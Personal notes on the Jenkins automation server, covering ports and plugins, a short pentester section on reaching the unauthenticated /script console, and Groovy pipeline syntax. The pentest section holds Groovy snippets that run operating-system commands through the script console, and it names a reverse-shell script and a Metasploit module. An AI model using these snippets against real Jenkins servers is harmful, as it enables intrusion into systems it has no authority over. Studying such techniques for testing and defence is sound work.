Jenkins
Jenkins is an open-source automation server. It means that it's not a server hosting code, but it can be connected to a GIT server such as GitLab to process CI/CD workflows.
- GitHub (22.2k β)
- User Documentation (βͺ)
The biggest strength of Jenkins is that it has a great number of plugins, such as plugins to visualize CI results (tests, coverage...).
Jenkins is written in Java, while Groovy is often used for plugins and for configuration files. It runs on Apache Tomcat.
Ports π²: 8080 (HTTP) and 5000 (Master/Slave communication).
Jenkins can be connected to a database or LDAP.
Jenkins Pentester Notes β οΈ
Useful reference: pwn_jenkins (1.9k β).
Enumeration
- Try to access the login page (
/login
)
Foothold
- Some Jenkins instances don't have authentication
- Some Jenkins instances may allow us to create accounts
Exploitation
The /script
endpoint can be used to run groovy code.
def command = "ls /"
def stdout = new StringBuffer(), stderr = new StringBuffer()
def process = command.execute()
process.consumeProcessOutput(stdout, stderr)
process.waitForOrKill(1000)
def exitCode = process.exitValue()
def output = stderr + stdout
println("Exit Code: ${exitCode}")
println("Output:\n${output}")
β‘οΈ See also: revsh.groovy (0.1k β).
Additional Notes For /script
Metasploit: exploit/multi/http/jenkins_script_console
.
r = Runtime.getRuntime()
p = r.exec(["/bin/ls","-la"] as String[])
p.waitFor()
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
π» To-do π»
Stuff that I found, but never read/used yet.
- master/slaves (a.k.a. workers)
- freestyle projects (web interface) vs pipeline jobs (as code)
- Jenkinsfile (groovy)
-
/var/lib/jenkins3/
Basic file
pipeline {
agent any
stages {
stage('xxx') {
steps {
git 'https://github.com/example/my-java-app.git'
git branch: env.BRANCH_NAME, url: 'URL'
sh 'xxx'
}
}
}
}
Add options
options {
buildDiscarder(logRotator(numToKeepStr: '10', daysToKeepStr: '7'))
}
Poll SCM or webhooks to trigger a pipeline
triggers {
cron('H H(0-7) * * 1-5')
webhook('')
}
Artifacts are the output of the build
post {
always {
junit '*.xml'
}
success {
archiveArtifacts '*.xml'
}
}
Bonus
stage('xxx') {
when {
branch 'development'
}
}
// https://plugins.jenkins.io/warnings-ng/
recordIssues(
tools: [clangTidy(pattern: 'clang-tidy-report.txt')]
)